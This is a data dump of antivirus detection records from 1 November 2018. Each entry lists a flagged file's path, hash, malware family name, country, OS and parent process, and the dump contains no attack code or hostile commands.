  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T02:17:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233847-4b54a32e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dd0b46a\\AVSCAN-20181101-233452-30025B13\\AVSCAN-20181101-233847-4B54A32E', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='39f73a8cee4a757a42eaa24082c03e16779360d5999678ddcc079b88db6738da', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:38:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143253-79e138c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143253-79E138C0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-11-52-10.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T15:02:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154845-78740bf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154845-78740BF7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152414-378b68b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152414-378B68B4', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160247-0644f9fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160247-0644F9FE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-01T19:09:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-041200-2d2bbcbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7741a6d\\AVSCAN-20181102-040844-166805B3\\AVSCAN-20181102-041200-2D2BBCBB', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134717-a44c187d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1dc482e\\AVSCAN-20181101-134657-9FD71A88\\AVSCAN-20181101-134717-A44C187D', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:47:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh626f', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH626F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-11-52-10.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T12:02:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='247421245311304.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\247421245311304.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhaaad.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHAAAD.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:59:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155650-ca2244b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155650-CA2244B0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='\\\\Shop-mep\\SCAN\\SCAN.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-01T06:46:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patcher.exe', filepath='\\?\\J:\\BlackShot\\Patcher.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9642af009fcaf97f3cc9e4d77296fd175dc41dddbd93ec3470577f90e2cc90db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:40:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_wm.exe', filepath='C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe', filesize=2048000, name='W32/Infector.Gen8.#M300.#R700734'), hash='e1720b45f9b5cde98c1b21014b2c1332d327d651cf478daad8c103f6447b1400', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LOLCT7hy8UO288CC.1', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T04:23:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235714-6511a8a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235714-6511A8A7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ultima lucrare.exe', filepath='F:\\Ultima lucrare\\Ultima lucrare.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:25:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\System32\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:39:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rtscua7.exe', filepath='\\\\?\\L:\\$RECYCLE.BIN\\S-1-5-21-3357244247-2250698326-3409966804-1000\\$RTSCUA7.exe', filesize=768000, name='TR/Dldr.Banload.Gen4.#M300.#R301211'), hash='bbeb7a757f7c702a01121892ad3dca3e29087602e928a614bc2f3095628942c8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='demigods.exe', filepath='\\?\\J:\\العاب2\\Demigods\\Demigods.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='afc0b61bf0eb77c98bf90b8e07603c3403200458eb850b79f42fca11ea9a5af8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213639-d6ab5d8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b284a54\\AVSCAN-20181101-211056-C9AF4117\\AVSCAN-20181101-213639-D6AB5D8B', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='97d074a4ad2d25720d9c88821148d958bb5e15d92e3bf8c810b98e47fc876b9d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T14:36:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235716-6542ce29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235716-6542CE29', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Pixologic ZBrush 4R8 P2 (x64) + Crack - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T07:22:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='FR', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T17:53:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='green bubbles.exe', filepath='F:\\Green Bubbles.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:22:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:38:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204344-094f6427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e817ee6d\\AVSCAN-20181101-202650-702AA411\\AVSCAN-20181101-204344-094F6427', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:43:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftclean.exe', filepath='C:\\Program Files (x86)\\OMRON\\Drivers\\USB\\CS1W-CIF31\\FTClean.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='d7338273f7e2bbe7db80d5e6be0099c50f8d7971081b78fbd8995b208ef33c34', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bworamm2EEOVuB+M.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T18:23:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8d3611350c442bd7fbc16b65540d023c29cb8a73af5b52d8134afc631fad95b6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\8D3611350C442BD7FBC16B65540D023C29CB8A73AF5B52D8134AFC631FAD95B6', filesize=512000, name='TR/Dropper.Gen2.#M300.#R100277'), hash='8d3611350c442bd7fbc16b65540d023c29cb8a73af5b52d8134afc631fad95b6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:37:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winsat.exe', filepath='\\\\?\\C:\\Windows\\system32\\WINSAT.EXE', filesize=3392000, name='W32/Virut.Gen.#M1.#R1'), hash='dab470963f99e52acae5be422ee4aaf8c9b8495c4a8b1c32cf0c44ee42fe3a37', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:01:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='\\\\?\\D:\\Games\\Kick Ass 2\\uninstall.exe', filesize=1664000, name='SPR/RedCap.d5bcb5.#M1.#R1'), hash='d5bcb5182fbe7d528baa0a81789abc91571133ea6728e4a1c77a42e3ae246df9', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:45:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:35:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221100-4433224b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1e6ba50\\AVSCAN-20181101-220940-3546EEA7\\AVSCAN-20181101-221100-4433224B', filesize=1536000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181106-8f6a3e3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76c821bc\\AVSCAN-20181101-181041-8BF251C4\\AVSCAN-20181101-181106-8F6A3E3E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gkjvwt5v.exe', filepath='\\\\?\\C:\\Windows\\oobe3\\gkjvwt5v.exe', filesize=4672000, name='HEUR/AGEN.1022544.#M1.#R1'), hash='7ea418f4c94cf73d1643c0f14e2ea4a7bb78a07701d094a5a53ba07b300bcad3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:31:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190816-e36c043c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3a1816b\\AVSCAN-20181101-190251-B4236E26\\AVSCAN-20181101-190816-E36C043C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:08:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-014457-64794875', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ee5abeb\\AVSCAN-20181102-014419-5EE7C54E\\AVSCAN-20181102-014457-64794875', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:44:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b4490', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b4490', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='56862d921cf3b23645ac2eb72e168fc44390004014d4f56ea323f40804ee6049', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\56862D921CF3B23645AC2EB72E168FC44390004014D4F56EA323F40804EE6049', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='56862d921cf3b23645ac2eb72e168fc44390004014d4f56ea323f40804ee6049', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:10:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc2b72971d-5777-f643-b176-54db516f216e.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc2B72971D-5777-F643-B176-54DB516F216E.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T17:27:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160609-38426dec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-160547-3573E057\\AVSCAN-20181101-160609-38426DEC', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='demo32.exe', filepath='K:\\NX.8.0\\demo32.exe', filesize=512000, name='HEUR/AGEN.1026005.#M1.#R1'), hash='311de4b50ea9c705f68012ec6564a0a78e94bc4f047e3a6f8dd9a859a44341c2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T11:10:11Z'), dt=datetime.date(2018, 11, 1)),
